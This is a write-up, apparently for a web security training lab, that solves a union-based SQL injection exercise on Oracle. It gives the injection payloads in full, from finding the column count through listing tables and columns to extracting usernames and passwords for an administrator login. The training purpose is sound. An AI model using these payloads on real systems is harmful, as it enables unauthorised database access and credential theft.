06 - SQL injection attack, listing the database contents on Oracle
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
Given : Injection point (Product category) , Attack type (Union)
Find : Table name >> Column name >> username & password
End goal : Log in as the administrator user
As we know that injection point is in product category filter, we have to click on any product category and capture the request in burp suite. After capturing the request next step would be finding the number of columns to make a vaild union query.
If we try Order by 2, it gives 200OK :
If we try Order by 3, it gives 500 Internal Server Error :
That means there are only 2 columns.
As we know there are 2 columns , now we have to extract the name of the table. We can inject the following query to list out all the tables
l'+UNION+select+null,table_name+FROM+all_tables--
In the list of all tables we have to find/guess the right table. In our case we have to find a table of users so the table name USERS_CVMDQF looks relevent for our purpose.
We have the table name, now we have to find all the column names. We can inject the following query to get the columns - l'+UNION+select+null, column_name+FROM+all_tab_columns+WHERE+table_name+%3d+ 'USERS_CVMDQF'--
In output , it lists the column names :
Now we have table name , column name, so we can create a query to get the password of the user. The injected query can be following - l'+UNION+select+USERNAME_KPUCTB,PASSWORD_NSWUKG+FROM+USERS_CVMDQF--
In the output , it lists the usernames and passwords :
Now login into the administrator user to solve the lab.
Lab Solved :
